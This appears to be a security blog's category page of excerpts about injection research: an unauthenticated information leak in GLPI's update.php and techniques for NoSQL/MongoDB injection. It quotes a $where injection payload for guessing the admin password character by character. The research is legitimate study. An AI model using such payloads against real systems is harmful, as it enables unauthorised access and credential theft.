Injection
Leakymetry: Circumventing GLPI Authentication
Intro GLPI (Gestionnaire libre de parc informatique) is a popular open-source software in France and Brazil. It is used to create a mapping of a network through an inventory plugin, but also to gather users’ issues through a ticket system.
Starting research As I was wondering how the update mechanism worked in GLPI, I saw something really interesting in this file.
It is important to note that most of the GLPI files are not accessible without authentication. Because of this, the attack surface on this software is reduced. However, the update.php script is accessible by an unauthenticated user. And this file contains juicy information. I started looking at it, and I immediately saw that this script under certain parameters, disclosed telemetry information.
NoSQL error-based injection
TL;DR How to do NoSQL error-based injection
In this second blog post (read the first one here), on NoSQL injection, I discuss how to do error-based injection. I think this might be a novel approach – at least my Google search-fu isn’t finding anything.
When trying to extract information via NoSQL injection, you typically make use of Boolean conditions to figure out a character. Portswigger has a couple of examples here.
In one of Portswigger’s examples, they consider the case where you can look up another user’s profile via a website that’s vulnerable to NoSQL $where injection. To get the first char of the admin user’s password, we then use the payload admin' && this.password[0] == 'a' || 'a'=='b
Getting rid of pre- and post-conditions in NoSQL injections
TL;DR: I found a cool way to get rid of pre-conditions in NOSQL syntax injections
I have been investigating NoSQL injection for a bit, trying to make it better, or at least somewhat equivalent to SQL injection. One of the things that are tricky with NoSQL injection is getting rid of pre- and post-conditions.
For this post I’m focusing on MongoDB, so s/NoSQL injection/Mongo injection/g Background In case you forgot, most MongoDB queries will look something like this in the background:
Page 1 of 1